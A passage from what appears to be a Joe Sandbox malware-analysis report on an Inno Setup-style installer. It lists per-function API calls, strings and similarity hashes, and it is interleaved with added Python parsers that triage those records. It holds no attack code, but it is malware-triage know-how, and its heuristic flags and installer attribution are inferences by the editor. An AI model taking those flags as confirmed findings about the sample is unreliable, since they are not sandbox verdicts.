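    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
# Symbolic flag annotations such as 00000001(MOVEFILE_REPLACE_EXISTING)
FLAG_RE = re.compile(r"\(([A-Z_][A-Z0-9_|]*)\)")

def split_args(args):
    """Split an argument list on top-level commas only (flags carry parens)."""
    out, cur, depth = [], "", 0
    for ch in args:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append(cur)
            cur = ""
        else:
            cur += ch
    if cur or out:
        out.append(cur)
    return out

def parse_api_line(line):
    """Parse one '• Foo.DLL(...), ref: XXXXXXXX' line into a dict, else None."""
    text = line.strip().lstrip("•").strip()
    m = API_RE.match(text)
    if not m:
        return None
    call = m.groupdict()
    call["unresolved"] = re.fullmatch(r"[0-9A-F]{8}", call["api"]) is not None
    call["flags"] = FLAG_RE.findall(call["args"] or "")
    call["argc"] = len(split_args(call["args"] or ""))
    return call

def parse_records(report_text):
    """Group lines into per-function records; each starts at an 'APIs' header."""
    records, cur = [], None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"api_id": None, "calls": []}
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith("• API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
        else:
            call = parse_api_line(line)
            if call:
                cur["calls"].append(call)
    return records

def triage(record):
    """Editor's heuristics: what an analyst would flag in one function's calls."""
    names = {c["api"] for c in record["calls"]}
    flags = {f for c in record["calls"] for f in c["flags"]}
    notes = []
    if any(c["unresolved"] for c in record["calls"]):
        notes.append("unresolved import (called by address; resolve it in IDA)")
    if {"WNetOpenEnumA", "WNetEnumResourceA"} <= names:
        notes.append("enumerates network resources/shares via MPR")
    if {"SetFileAttributesA", "MoveFileExA"} <= names and "MOVEFILE_REPLACE_EXISTING" in flags:
        notes.append("clears file attributes, then replaces a file in place")
    if {"MessageBoxA", "ExitProcess"} <= names:
        notes.append("fatal-error path: message box, then process exit")
    if {"LoadTypeLib", "RegisterTypeLib"} <= names:
        notes.append("registers a COM type library (writes HKCR\\TypeLib)")
    return notes

# Constructed from records on this page (GDI32, MPR, KERNEL32, USER32, OLEAUT32).
SAMPLE = """\
APIs
• 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
• 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
• API ID: A022A08830$A480
APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
• API ID: Enum$NameOpenResourceUniversal
APIs
• GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
• API ID: File$Attributes$Move
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
• API ID: ExitMessageProcess
APIs
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
• RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec["api_id"], sorted(c["api"] for c in rec["calls"]), triage(rec))
```

Run it against the full report text instead of SAMPLE to get one triage line per function. The `String ID` field is worth feeding into a second pass: the `isRS-%.3u.tmp` and `_iu` temporary-file names next to the Delphi-style `Runtime error at 00000000` message are the kind of strings an analyst matches against known installer frameworks (they are characteristic of Inno Setup, whose setup stub is written in Delphi) so that time is spent on the payload functions rather than on installer scaffolding; that attribution is the editor's reading of the strings, not a finding stated by the sandbox.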
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                      • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitMessageProcess
                                                                                                      • String ID: Error$Runtime error at 00000000
                                                                                                      • API String ID: 1220098344-2970929446
                                                                                                      • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                      • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                      • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                                                                      • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                      • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                      • API String ID: 1312246647-2435364021
                                                                                                      • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                                      • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                                                                      • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                                                      • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                                                                      • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                                                                      Strings
                                                                                                      • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                                                                      • Failed to create DebugClientWnd, xrefs: 0045700C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                      • API String ID: 3850602802-3720027226
                                                                                                      • Opcode ID: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                                      • Instruction ID: 61f5065308a022425a12d25e559eb7300ab1b4b0d104b50eccf394a1c4e119f6
                                                                                                      • Opcode Fuzzy Hash: e461573c832d53d536b60bdd09be1689879239ada0565844d92a82a55e03096e
                                                                                                      • Instruction Fuzzy Hash: 921123706082509BD300AB689C82B5F7BD89B55719F45403BF9859B3C3D7798C08C7AE
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000,00495E13), ref: 00495DDE
                                                                                                      • CloseHandle.KERNEL32(x^I,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495E38,?,00495E2C,00000000), ref: 00495DF5
                                                                                                        • Part of subcall function 00495CC8: GetLastError.KERNEL32(00000000,00495D60,?,?,?,?), ref: 00495CEC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorHandleLastProcess
                                                                                                      • String ID: D$x^I
                                                                                                      • API String ID: 3798668922-903578107
                                                                                                      • Opcode ID: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                                      • Instruction ID: 0d7d1bccb2b79611993d32b5dcf50d38d0c3e5c5098d5d0063742a7482510134
                                                                                                      • Opcode Fuzzy Hash: 39c0d8672a1bce61a407111d09c5e91ba0fa0ceca0774959188b9b62fea67dd3
                                                                                                      • Instruction Fuzzy Hash: F201A1B1604648AFDF01EBA2DC42E9FBBACDF08704F60003AF904E72C1D6385E008A28
                                                                                                      APIs
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • GetFocus.USER32 ref: 00478673
                                                                                                      • GetKeyState.USER32(0000007A), ref: 00478685
                                                                                                      • WaitMessage.USER32(?,00000000,004786AC,?,00000000,004786D3,?,?,00000001,00000000,?,?,?,0047FED4,00000000,00480D8E), ref: 0047868F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessageStateTextWaitWindow
                                                                                                      • String ID: Wnd=$%x
                                                                                                      • API String ID: 1381870634-2927251529
                                                                                                      • Opcode ID: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                      • Instruction ID: ef44951ba698f020dd2967180cd2d6f5e0b89f016f08406409eb47c9a327eab3
                                                                                                      • Opcode Fuzzy Hash: 1a422d4577b49dccfc2774414577709a46ec3ce372f56b5ec11200a8bbcf7a92
                                                                                                      • Instruction Fuzzy Hash: 2411A374644244BFC700EF65DD45A9E7BF8EB49714B5184BAF408E3691DB38AE00CA6E
                                                                                                      APIs
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E8C0
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E8CF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$File$LocalSystem
                                                                                                      • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                      • API String ID: 1748579591-1013271723
                                                                                                      • Opcode ID: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                                      • Instruction ID: 5dd70de3b3cbc2db986134396dd9c806d54cb2705fd1511918c86a199fc004ed
                                                                                                      • Opcode Fuzzy Hash: 2e2682d59cfc45f7ed460395edcc4d500eda373c92ad7cb826f7e8648d0918d2
                                                                                                      • Instruction Fuzzy Hash: 1711F8A440C3919AD340DF2AC44432BBBE4AF89704F44892EF9D8D6381E779C948DB77
                                                                                                      APIs
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F6F
                                                                                                        • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F94
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesDeleteErrorLastMove
                                                                                                      • String ID: DeleteFile$MoveFile
                                                                                                      • API String ID: 3024442154-139070271
                                                                                                      • Opcode ID: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                                      • Instruction ID: b42c41819cc20c1867e4fcb1ab4fb5766129ddbc0fc5112b2d6697d8e42203d6
                                                                                                      • Opcode Fuzzy Hash: 987ea279d6d59187c3e0b7c28975cb0d289204635ad797c92353d6d323b91857
                                                                                                      • Instruction Fuzzy Hash: 49F062716041455AEB01FAA5D84266EA3ECDB8430BFA0403BB800BB6C3DA3C9E09493D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483685
                                                                                                      • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004836A8
                                                                                                      Strings
                                                                                                      • CSDVersion, xrefs: 0048367C
                                                                                                      • System\CurrentControlSet\Control\Windows, xrefs: 00483652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                      • API String ID: 3677997916-1910633163
                                                                                                      • Opcode ID: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                                      • Instruction ID: 3c550b8be62ae6962ae8a8b2bb2136c6a1766c1456238aff6c9f059f5d92f743
                                                                                                      • Opcode Fuzzy Hash: 753ec1cdaceecf10a2c10abed9fa14ba9196f183527e9def43a7b07e5ea74203
                                                                                                      • Instruction Fuzzy Hash: B1F06D75E00208B6DF20EED88C45BAFB3BCAF14B05F204566E910E7381F6789B448B59
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                      • API String ID: 47109696-2631785700
                                                                                                      • Opcode ID: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                                      • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                                                                      • Opcode Fuzzy Hash: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                                      • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
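The function records above (APIs, Strings, Memory Dump Source, Similarity) are what a triager pivots on when a signature such as "Contains functionality to dynamically determine API calls" fires: the record names the call sites, the literal strings and the fuzzy hashes that produced the hit. The following parser is an added example, not part of this report and not Joe Sandbox's own tooling; it turns records in this layout into structured objects and derives three things a practitioner wants from them: which export names a record resolves at run time through GetProcAddress, an index from MODULE!Api to the addresses that call it, and the registry paths touched by records that call Reg* APIs. The SAMPLE text is constructed to mirror the record layout on this page (two abbreviated records) rather than copied verbatim, and the field names it keys on (API ID, String ID, Source File) are assumed to be stable across records as they appear here.

```python
"""Parse Joe Sandbox function records (APIs / Strings / Memory Dump Source /
Similarity blocks) into structured data for triage.  Added example; the
SAMPLE below is constructed to mirror the report layout, not copied from it."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46), ref: 0042D91A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetSystemWow64DirectoryA$kernel32.dll
• API String ID: 1646373207-4063490227
APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\\CurrentControlSet\\Control\\Windows), ref: 0042DE48
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?), ref: 00483685
• RegCloseKey.ADVAPI32(?), ref: 004836A8
Strings
• CSDVersion, xrefs: 0048367C
• System\\CurrentControlSet\\Control\\Windows, xrefs: 00483652
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpenQueryValue
• String ID: CSDVersion$System\\CurrentControlSet\\Control\\Windows
• API String ID: 3677997916-1910633163
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Name.MODULE(args), ref: ADDR"; args are optional (e.g. "GetFocus.USER32 ref: ...")
# and an indirect call is prefixed with "Part of subcall function ADDR: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^(?P<key>[^:]+): (?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall_of: str | None = None  # callee address when the API is reached indirectly


@dataclass
class FuncRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str | None]] = field(default_factory=list)  # (text, xref)
    source_file: str | None = None
    similarity: dict[str, str] = field(default_factory=dict)


def parse_records(text: str) -> list[FuncRecord]:
    """Walk the report line by line; every 'APIs' header opens a new record."""
    records: list[FuncRecord] = []
    section, rec = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = FuncRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                rec.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
        elif section == "Strings":
            m = XREF_RE.match(body)
            rec.strings.append((m["text"], m["ref"]) if m else (body, None))
        elif section == "Memory Dump Source":
            if body.startswith("Source File: "):
                rec.source_file = body[len("Source File: "):].split(",")[0]
        elif section == "Similarity":
            m = KV_RE.match(body)
            if m:
                rec.similarity[m["key"]] = m["val"]
    return records


def dynamic_import_targets(rec: FuncRecord) -> list[str]:
    """Export names a record resolves at run time: it calls GetProcAddress and its
    String ID carries literals that are not DLL names (heuristic, assumed here)."""
    if not any(a.name == "GetProcAddress" for a in rec.apis):
        return []
    literals = rec.similarity.get("String ID", "").split("$")
    return [s for s in literals if s and not s.lower().endswith(".dll")]


def api_index(records: list[FuncRecord]) -> dict[str, list[str]]:
    """MODULE!Api -> sorted call-site addresses (direct calls only), for pivoting
    from a signature hit to the code that produced it."""
    index: dict[str, set[str]] = {}
    for rec in records:
        for a in rec.apis:
            if a.subcall_of is None:
                index.setdefault(f"{a.module}!{a.name}", set()).add(a.ref)
    return {k: sorted(v) for k, v in sorted(index.items())}


def registry_keys(records: list[FuncRecord]) -> list[str]:
    """Registry paths referenced by records that call any Reg* API."""
    keys = set()
    for rec in records:
        if any(a.name.startswith("Reg") for a in rec.apis):
            keys.update(s for s, _ in rec.strings if "\\" in s)
    return sorted(keys)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, r in enumerate(recs):
        print(i, [f"{a.module}!{a.name}@{a.ref}" for a in r.apis], dynamic_import_targets(r))
    print(api_index(recs))
    print(registry_keys(recs))
```

Run it against the full report text instead of SAMPLE and the index gives every address to bookmark in the dump (hcaresult snapshot above) for the IsDebuggerPresent, GetProcAddress and CreateProcessA hits listed under Signatures; the registry list is a quick way to see that the only keys this batch of records touches are the Windows CSDVersion and .NET InstallRoot lookups typical of an installer stub.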
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                      • API String ID: 1646373207-4063490227
                                                                                                      • Opcode ID: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                                      • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                                                                      • Opcode Fuzzy Hash: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                                      • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
